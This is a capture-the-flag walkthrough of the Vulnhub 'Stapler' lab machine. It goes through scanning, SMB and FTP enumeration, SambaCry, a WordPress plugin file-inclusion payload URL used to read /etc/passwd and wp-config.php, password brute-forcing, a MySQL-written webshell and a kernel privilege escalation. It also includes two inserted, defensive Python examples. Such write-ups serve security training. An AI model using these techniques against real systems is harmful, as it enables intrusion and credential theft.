Vulnhub-Stapler-1

This is another machine from the OSCP-prep VM list.

Download link: stapler

Information gathering

nmap scan results

Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-19 22:07 CST
Nmap scan report for 192.168.56.139
Host is up (0.00036s latency).

PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 550 Permission denied.
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.56.1
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)
| 256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)
|_ 256 6d:01:b7:73:ac:b0:93:6f:fa:b9:89:e6:ae:3c:ab:d3 (ED25519)
53/tcp open domain dnsmasq 2.75
| dns-nsid:
|_ bind.version: dnsmasq-2.75
80/tcp open http PHP cli server 5.5 or later
|_http-title: 404 Not Found
123/tcp closed ntp
137/tcp closed netbios-ns
138/tcp closed netbios-dgm
139/tcp open netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
666/tcp open tcpwrapped
3306/tcp open mysql MySQL 5.7.12-0ubuntu1
| mysql-info:
| Protocol: 10
| Version: 5.7.12-0ubuntu1
| Thread ID: 9
| Capabilities flags: 63487
| Some Capabilities: Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, FoundRows, IgnoreSigpipes, SupportsTransactions, DontAllowDatabaseTableColumn, Support41Auth, LongPassword, InteractiveClient, Speaks41ProtocolOld, ConnectWithDatabase, SupportsLoadDataLocal, ODBCClient, SupportsCompression, LongColumnFlag, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments
| Status: Autocommit
| Salt: "s\x04xO\x1F%\x07j2<\x06i'j\x02 \x12t\x0B
|_ Auth Plugin Name: mysql_native_password
12380/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Tim, we need to-do better next year for Initech
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 7h39m57s, deviation: 34m38s, median: 7h59m57s
|_nbstat: NetBIOS name: RED, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
| Computer name: red
| NetBIOS computer name: RED\x00
| Domain name: \x00
| FQDN: red
|_ System time: 2020-06-19T23:07:17+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-06-19T22:07:18
|_ start_date: N/A

After scanning directories I found .bashrc and .profile; I downloaded them and had a look, but neither seemed to help.

nikto scan

The scan of port 80 didn't look helpful, so I scanned port 12380 again.

Huh, nikto reported two paths:

  • admin112233
  • blogblog

They couldn't be reached over http, but trying https worked.

It looks like a WordPress blog.

Let's look at admin112233.
After clicking confirm, I was redirected to a page of XSS payloads.

robots.txt

User-agent: *
Disallow: /admin112233/
Disallow: /blogblog/

SMB share enumeration

Trying to connect

In the backup share I found vsftpd.conf, and the anonymous-user option is enabled. Let's first see what's on the FTP server.


The FTP directory contains only one file, with the content:

Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.

What is the "payload information"?... My poor English is really costing me here. The anonymous FTP directory doesn't seem to hold anything else, so back to the samba shares.
Unfortunately, the wordpress.tar.gz under the backup directory isn't a backup of the site, just an installer package.

The kathy_stuff directory holds only a todolist, with the content:

I’m making sure to backup anything important for Initech, Kathy

No more clues, it seems. So far I have found Kathy, John, Elly, Harry, zoe; these four look like usernames on the target server.

Connecting to the samba tmp share

There's only one file, ls, whose content is:

It doesn't seem to get updated.

At this point the SMB and FTP leads ran dry. I was stuck, so I tried searching for vulnerabilities in the versions of the services the server is running.

SambaCry privilege escalation


The only one matching the target version seems to be 42084.rb. Looking at its content, it's for CVE-2017-7494 and it's an rb script, so I went straight to msf.

Privilege escalation succeeded.

This should be the easiest way to get root, I guess...

Trying exploits outside the msf framework

Download: exp-joxeankoret-CVE-2017-7494
The target's Samba version is 4.3.9; exploitation failed.

exp42060 sambacry exp
Also failed, and I don't know how to modify it (a script kiddie is a script kiddie, truly useless).

I also tried this exp, again without success.

Honestly, I feel the other exploits should work too... why is it only the msf one that does? Could it be related to my local environment? I was still in the dark. With that in mind, I went back and tried the msf exploit again, and it still worked. I re-read the help for the 42060 sambacry exp and noticed there's a parameter, -x. After looking at that parameter, I wondered whether it had to do with the target machine's architecture: the script defaults to an x86_64 .so file, which cannot run on a 32-bit machine, so it kept failing. With that in mind I added the -x parameter, and it worked...

...At this point I just want to call myself an idiot.

Exploitation: getting a webshell

Scan the target blog with wpscan

wpscan --url "https://192.168.56.139:12380/blogblog/" --disable-tls-checks

[+] URL: https://192.168.56.139:12380/blogblog/ [192.168.56.139]
[+] Started: Sat Jun 20 04:02:20 2020

Interesting Finding(s):

[+] Headers
| Interesting Entries:
| - Server: Apache/2.4.18 (Ubuntu)
| - Dave: Soemthing doesn't look right here
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] XML-RPC seems to be enabled: https://192.168.56.139:12380/blogblog/xmlrpc.php
| Found By: Headers (Passive Detection)
| Confidence: 100%
| Confirmed By:
| - Link Tag (Passive Detection), 30% confidence
| - Direct Access (Aggressive Detection), 100% confidence
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] https://192.168.56.139:12380/blogblog/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] Registration is enabled: https://192.168.56.139:12380/blogblog/wp-login.php?action=register
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] Upload directory has listing enabled: https://192.168.56.139:12380/blogblog/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: https://192.168.56.139:12380/blogblog/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.2.1 identified (Insecure, released on 2015-04-27).
| Found By: Rss Generator (Passive Detection)
| - https://192.168.56.139:12380/blogblog/?feed=rss2, <generator>http://wordpress.org/?v=4.2.1</generator>
| - https://192.168.56.139:12380/blogblog/?feed=comments-rss2, <generator>http://wordpress.org/?v=4.2.1</generator>

[+] WordPress theme in use: bhost
| Location: https://192.168.56.139:12380/blogblog/wp-content/themes/bhost/
| Last Updated: 2019-12-08T00:00:00.000Z
| Readme: https://192.168.56.139:12380/blogblog/wp-content/themes/bhost/readme.txt
| [!] The version is out of date, the latest version is 1.4.4
| Style URL: https://192.168.56.139:12380/blogblog/wp-content/themes/bhost/style.css?ver=4.2.1
| Style Name: BHost
| Description: Bhost is a nice , clean , beautifull, Responsive and modern design free WordPress Theme. This theme ...
| Author: Masum Billah
| Author URI: http://getmasum.net/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.2.9 (80% confidence)
| Found By: Style (Passive Detection)
| - https://192.168.56.139:12380/blogblog/wp-content/themes/bhost/style.css?ver=4.2.1, Match: 'Version: 1.2.9'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <=====================================================================================================================> (21 / 21) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

WordPress 4.2.1 doesn't seem to have a usable exploit.

https://192.168.56.139:12380/blogblog/xmlrpc.php is vulnerable to an XML-RPC DoS, but that doesn't seem useful to us.

Clicking https://192.168.56.139:12380/blogblog/wp-content/themes/bhost/readme.txt, I found the directory can be traversed too (listing enabled).

Took a look at the plugins.

After searching, I found that the advanced-video-embed-embed-videos-or-playlists plugin on the blog is version 1.0 and has a file inclusion vulnerability.

Looked at the payload someone skilled had already constructed:

http://127.0.0.1/wordpress/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=[FILEPATH]

Just change it to the target site's URI.
Try including /etc/passwd; if the inclusion succeeds, a jpeg file is added under the uploads directory and a new post appears on the home page.
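The bug above comes from a plugin opening whatever path arrives in the thumb parameter. Below is an added Python example (not the plugin's code) of the vulnerable pattern next to a hardened reader that confines the path to the plugin's own uploads directory; the uploads directory, the config file and the request values are constructed for the demo.

```python
import os
import tempfile

ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif"}

def read_thumb_unsafe(thumb):
    """Vulnerable pattern: the request value is opened as-is, so a
    thumb of '/etc/passwd' or '../wp-config.php' is read and copied."""
    with open(thumb, "rb") as fh:
        return fh.read()

def resolve_thumb(uploads_dir, thumb):
    """Hardened: treat 'thumb' as a name relative to the uploads directory,
    resolve '..' and symlinks, and refuse anything that escapes that directory
    or is not an image file. Returns the absolute path or None."""
    base = os.path.realpath(uploads_dir)
    if os.path.isabs(thumb) or "\x00" in thumb:
        return None
    candidate = os.path.realpath(os.path.join(base, thumb))
    if os.path.commonpath([base, candidate]) != base:
        return None  # escaped via '..' or a symlink
    if os.path.splitext(candidate)[1].lower() not in ALLOWED_EXT:
        return None
    return candidate if os.path.isfile(candidate) else None

def read_thumb_safe(uploads_dir, thumb):
    path = resolve_thumb(uploads_dir, thumb)
    if path is None:
        raise ValueError("thumb rejected: %r" % thumb)
    with open(path, "rb") as fh:
        return fh.read()

def demo():
    """Constructed uploads dir with one real image beside a fake wp-config.php;
    returns which request values the hardened resolver accepts."""
    with tempfile.TemporaryDirectory() as d:
        up = os.path.join(d, "uploads")
        os.mkdir(up)
        with open(os.path.join(up, "2084215694.jpeg"), "wb") as fh:
            fh.write(b"\xff\xd8\xff")  # constructed JPEG header bytes
        with open(os.path.join(d, "wp-config.php"), "w") as fh:
            fh.write("<?php // constructed stand-in for the real config")
        results = {}
        for req in ("2084215694.jpeg", "../wp-config.php", "/etc/passwd", "x.php"):
            results[req] = resolve_thumb(up, req) is not None
        return results
```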


Download the target file and cat it.

wget https://192.168.56.139:12380/blogblog/wp-content/uploads/2084215694.jpeg --no-check-certificate # don't verify the SSL certificate

Inclusion succeeded! Now I think we can try including wp-config to see the database credentials. Comparing with the wordpress.tar.gz found in the SMB share, wp-config.php is not under wp-admin but in the root of blogblog (because the extracted archive has a wp-config-sample.php there).

Logged into the database successfully.

Checking some configuration settings

Because the file-write related setting is empty, we can write files to any path we choose.
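Three configuration weaknesses carry this walkthrough: anonymous login in vsftpd.conf, a Samba configuration without the CVE-2017-7494 workaround (nt pipe support = no) and without mandatory signing, and the empty secure_file_priv just mentioned. The following Python audit is an added example, not part of the original post; the config fragments it checks are constructed to mirror the box's findings.

```python
import re

# Constructed config fragments modelled on this box: vsftpd with anonymous
# login on, smb.conf without the SambaCry workaround, and a [mysqld] section
# whose empty secure_file_priv leaves SELECT ... INTO OUTFILE / LOAD_FILE unrestricted.
VSFTPD_CONF = "listen=YES\nanonymous_enable=YES\nlocal_enable=YES\n"
SMB_CONF = "[global]\n   workgroup = WORKGROUP\n   server role = standalone server\n"
MYSQLD_CNF = "[mysqld]\nbind-address = 0.0.0.0\nsecure_file_priv =\n"

def parse_kv(text):
    """Parse 'key = value' lines (vsftpd, smb.conf and my.cnf share this shape).
    Keys are lower-cased with spaces, '_' and '-' removed so 'nt pipe support'
    and 'secure-file-priv' match however they are spelled; comments and
    [section] headers are skipped; a key with no value maps to ''."""
    opts = {}
    for raw in text.splitlines():
        line = re.split(r"[#;]", raw, maxsplit=1)[0].strip()
        if not line or line.startswith("["):
            continue
        key, _, value = line.partition("=")
        opts[re.sub(r"[\s_-]", "", key).lower()] = value.strip().strip('"')
    return opts

def audit_vsftpd(text):
    opts = parse_kv(text)  # vsftpd's compiled-in default for anonymous_enable is YES
    if opts.get("anonymousenable", "YES").upper() == "YES":
        return ["vsftpd: anonymous_enable=YES, anonymous FTP login allowed"]
    return []

def audit_smb(text):
    opts, findings = parse_kv(text), []
    # Samba's published mitigation for CVE-2017-7494 is 'nt pipe support = no';
    # the default is yes, so an absent key is still the exposed configuration.
    if opts.get("ntpipesupport", "yes").lower() != "no":
        findings.append("smb: nt pipe support not disabled (CVE-2017-7494 workaround absent)")
    if opts.get("serversigning", "default").lower() != "mandatory":
        findings.append("smb: server signing not mandatory")
    return findings

def audit_mysqld(text):
    opts, findings = parse_kv(text), []
    if opts.get("securefilepriv") == "":  # set but empty: no path restriction at all
        findings.append("mysqld: secure_file_priv is empty, file read/write to any path")
    if opts.get("bindaddress", "127.0.0.1") not in ("127.0.0.1", "localhost", "::1"):
        findings.append("mysqld: bind-address exposes MySQL on the network (3306 open)")
    return findings

def audit_all():
    return audit_vsftpd(VSFTPD_CONF) + audit_smb(SMB_CONF) + audit_mysqld(MYSQLD_CNF)
```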

AntSword connected successfully (HTTPS certificate verification has to be turned off first).

At this point we have a webshell. Really exhausting...

Brute-forcing the WordPress user password

Looking at the result: invalid username.

Confirmed the username is john, and there is no retry limit, so we can try brute-forcing the password.

Brute-forcing the user's password

After logging in I tried to write a one-line webshell, but it failed because the theme template files aren't writable... Installing a theme didn't work either.

Looks like not enough permissions were granted.

Privilege escalation: sensitive information disclosure

After enumerating the system, I found something special.

This one is actually run as root, which struck me as odd; going to that user's home directory, I found bash_history readable.

peter is the user with uid 1000, so he may have sudo privileges. With that idea, I logged in to see.

Feels like a relatively easy privilege escalation...

Kernel privilege escalation

Checking the kernel information, it's an Ubuntu system with kernel 4.4.0.21.

Searching the exploit database, there seem to be quite a few. Promising?

After excluding x64 and non-matching versions, only these remain:

  • 39772.txt
  • 43418.c
  • 47169.c
  • 44298.c

In the end I chose 39772.txt, CVE-2016-4557. Following the exploit's instructions, run compile.sh to build, then execute doubleput to get root. This vulnerability was found by Google's Project Zero: Issue 808: Linux: UAF via double-fdput() in bpf(BPF_PROG_LOAD) error path.

Summary